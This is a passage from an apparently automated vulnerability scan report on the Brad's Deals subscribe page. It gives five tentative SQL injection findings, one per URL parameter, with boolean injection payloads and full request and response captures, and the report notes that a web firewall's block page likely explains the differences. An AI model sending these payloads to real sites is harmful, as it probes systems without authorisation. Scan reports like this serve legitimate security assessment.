<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." /> <meta name="y_key" content="851f0d788ded642a" /> <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" /> <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" /> <meta name="y_key" content="7aee1ecd68e082ef" /> <meta name="y_key" content="33d564d1ed93f6ba" /> <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" /> <meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" /> <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" /> <meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/> <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" /> <!-- RSS --> <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" /> <!-- /RSS -->
<!-- CSS --> <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]--> <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s ...[SNIP]...
1.34. http://www.bradsdeals.com/dealsoftheday/subscribe/b [tid parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.bradsdeals.com |
| Path: | /dealsoftheday/subscribe/b |
Issue detail
The tid parameter appears to be vulnerable to SQL injection attacks. The payloads 13173906%20or%201%3d1--%20 and 13173906%20or%201%3d2--%20 were each submitted in the tid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. As with the s parameter, Response 1 here is a dotDefender block page (X-dotDefender-denied: 1) while Response 2 is the normal subscribe page, so the observed difference comes from the web application firewall rejecting the first payload and does not by itself demonstrate that the tid value reaches a SQL query.
Request 1
GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d1--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 Denied Content-Type: text/html Server: Microsoft-IIS/7.0 X-dotDefender-denied: 1 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:35:22 GMT Connection: close Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Your request has been blocked</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <meta name="robots" content="noindex, nofollow, noarchive"/> <style type="text/css"> body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4} </style> </head> <body> <div id="box"> <span id="datetime">16-Sep-11</span> <h1>This request has been blocked.</h1><br/> <div id="message">Please contact the site administrator, and provide the following Reference ID:</div> <div id="refid">9559-4CA2-4454-70E1</div> </div> </body> </html>
Request 2
GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d2--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=30665613173906%20or%201%3D2%2D%2D%20;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:23 GMT
Content-Length: 23937
<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8">
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." /> <meta name="y_key" content="851f0d788ded642a" /> <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" /> <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" /> <meta name="y_key" content="7aee1ecd68e082ef" /> <meta name="y_key" content="33d564d1ed93f6ba" /> <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" /> <meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" /> <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" /> <meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/> <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" /> <!-- RSS --> <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" /> <!-- /RSS -->
<!-- CSS --> <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]--> <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]--> ...[SNIP]...
1.35. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_campaign parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.bradsdeals.com |
| Path: | /dealsoftheday/subscribe/b |
Issue detail
The utm_campaign parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_campaign parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case Response 1 carries an X-dotDefender-denied: 1 header and a generic block page, while Response 2 is the normal page, so the difference between the two responses is consistent with a web application firewall rejecting the first payload rather than with a change in the result of a SQL query; treat the finding as unconfirmed until manual review shows the parameter actually reaches a database query.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:40:38 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Your request has been blocked</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <meta name="robots" content="noindex, nofollow, noarchive"/> <style type="text/css"> body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4} </style> </head> <body> <div id="box"> <span id="datetime">16-Sep-11</span> <h1>This request has been blocked.</h1><br/> <div id="message">Please contact the site administrator, and provide the following Reference ID:</div> <div id="refid">FD93-D5AD-C1CD-45A9</div> </div> </body> </html>
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:40:39 GMT
Content-Length: 23937
<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8">
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." /> <meta name="y_key" content="851f0d788ded642a" /> <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" /> <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" /> <meta name="y_key" content="7aee1ecd68e082ef" /> <meta name="y_key" content="33d564d1ed93f6ba" /> <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" /> <meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" /> <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" /> <meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/> <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" /> <!-- RSS --> <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" /> <!-- /RSS -->
<!-- CSS --> <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]--> <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s ...[SNIP]...
1.36. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_content parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.bradsdeals.com |
| Path: | /dealsoftheday/subscribe/b |
Issue detail
The utm_content parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_content parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case Response 1 carries an X-dotDefender-denied: 1 header and a generic block page, while Response 2 is the normal page, so the difference between the two responses is consistent with a web application firewall rejecting the first payload rather than with a change in the result of a SQL query; treat the finding as unconfirmed until manual review shows the parameter actually reaches a database query.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d1--%20&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:39:16 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Your request has been blocked</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <meta name="robots" content="noindex, nofollow, noarchive"/> <style type="text/css"> body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4} </style> </head> <body> <div id="box"> <span id="datetime">16-Sep-11</span> <h1>This request has been blocked.</h1><br/> <div id="message">Please contact the site administrator, and provide the following Reference ID:</div> <div id="refid">EC40-EAA6-197E-4D06</div> </div> </body> </html>
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d2--%20&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:39:16 GMT
Content-Length: 23937
<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8">
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." /> <meta name="y_key" content="851f0d788ded642a" /> <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" /> <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" /> <meta name="y_key" content="7aee1ecd68e082ef" /> <meta name="y_key" content="33d564d1ed93f6ba" /> <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" /> <meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" /> <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" /> <meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/> <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" /> <!-- RSS --> <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" /> <!-- /RSS -->
<!-- CSS --> <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]--> <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s ...[SNIP]...
1.37. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_medium parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.bradsdeals.com |
| Path: | /dealsoftheday/subscribe/b |
Issue detail
The utm_medium parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_medium parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case Response 1 carries an X-dotDefender-denied: 1 header and a generic block page, while Response 2 is the normal page, so the difference between the two responses is consistent with a web application firewall rejecting the first payload rather than with a change in the result of a SQL query; treat the finding as unconfirmed until manual review shows the parameter actually reaches a database query.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d1--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:37:51 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Your request has been blocked</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <meta name="robots" content="noindex, nofollow, noarchive"/> <style type="text/css"> body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4} </style> </head> <body> <div id="box"> <span id="datetime">16-Sep-11</span> <h1>This request has been blocked.</h1><br/> <div id="message">Please contact the site administrator, and provide the following Reference ID:</div> <div id="refid">812E-ADAC-F15B-DC88</div> </div> </body> </html>
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d2--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:37:52 GMT
Content-Length: 23937
<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8">
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." /> <meta name="y_key" content="851f0d788ded642a" /> <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" /> <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" /> <meta name="y_key" content="7aee1ecd68e082ef" /> <meta name="y_key" content="33d564d1ed93f6ba" /> <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
<meta name="robots" content="noodp" /> <meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" /> <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" /> <meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/> <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" /> <!-- RSS --> <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" /> <!-- /RSS -->
<!-- CSS --> <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]--> <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s ...[SNIP]...
1.38. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_source parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.bradsdeals.com |
| Path: | /dealsoftheday/subscribe/b |
Issue detail
The utm_source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case Response 1 carries an X-dotDefender-denied: 1 header and a generic block page, while Response 2 is the normal page, so the difference between the two responses is consistent with a web application firewall rejecting the first payload rather than with a change in the result of a SQL query; treat the finding as unconfirmed until manual review shows the parameter actually reaches a database query.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d1--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:36:11 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Your request has been blocked</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <meta name="robots" content="noindex, nofollow, noarchive"/> <style type="text/css"> body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4} </style> </head> <body> <div id="box"> <span id="datetime">16-Sep-11</span> <h1>This request has been blocked.</h1><br/> <div id="message">Please contact the site administrator, and provide the following Reference ID:</div> <div id="refid">78FC-DB12-C099-3AAB</div> </div> </body> </html>
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d2--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:36:11 GMT
Content-Length: 23937
<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8">
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." /> <meta name="y_key" content="851f0d788ded642a" /> <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" /> <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />
<meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" /> <meta name="y_key" content="7aee1ecd68e082ef" /> <meta name="y_key" content="33d564d1ed93f6ba" /> <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
